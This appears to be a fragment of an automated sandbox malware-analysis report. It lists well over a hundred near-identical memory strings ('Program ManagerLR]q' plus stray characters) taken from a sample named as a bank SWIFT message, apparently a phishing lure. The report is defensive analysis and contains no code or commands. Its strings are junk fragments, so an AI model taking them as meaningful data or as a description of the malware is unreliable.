                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|U
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<)+
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|T
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qx@(
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\?
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\<
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\9
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|Z
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\:
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q>
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<F
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\f
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<C
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q q!
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<B
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\o
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<O
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qF
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<P
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qD
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<N
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qI
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qH
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\i
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<I
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qG
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|x
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|u
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\U
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT6&
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q5
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\]
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\^
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|{
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q:
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q9
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q||
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|z
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q<g
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q^
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpo*
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,H+
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q_
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qj
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qh
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qD7-
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qL
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\q
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qP
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q\~
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qY
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qpO)
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$^&
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX$
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4~
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4y
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX)
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX*
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX'
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX%
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX&
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qx0
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4v
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qx8
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qx6
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8#
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8!
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qhD'
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8"
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qx_
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX?
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXK
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXL
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxi
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8*
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8'
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxg
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxh
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXf%
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q(
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qx\
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX9
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxZ
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q,.'
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxV
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXc
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8B
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qd|
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qX_
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXk
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8K
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q83
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8/
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXP
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q80
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxm
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8.
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qLK$
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qxw
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8d
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q@3!
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|#
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q`t&
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|0
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q|+
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8S
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8T
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT\#
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXq
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXr
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXp
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8Y
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPu-
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q8U
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXv
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q41
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0{
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qt=
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0x
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qt9
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtF
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT$
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0k
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qt/
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0l
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0i
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q$R,
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0h
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q0f
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qt7
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qt8
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qPI!
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4s)
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qt2
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qt_
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qt`
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT@
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT>
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qt[
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT;
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qdr#
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtc
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTC
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4#
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTD
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]q4$
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtd
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qTA
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qta
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qDR(
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qXZ
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qT.
                Source: Ziraat Bankasi Swift Mesaji.exe, 00000005.00000002.4528266173.0000000002D76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR]qtL
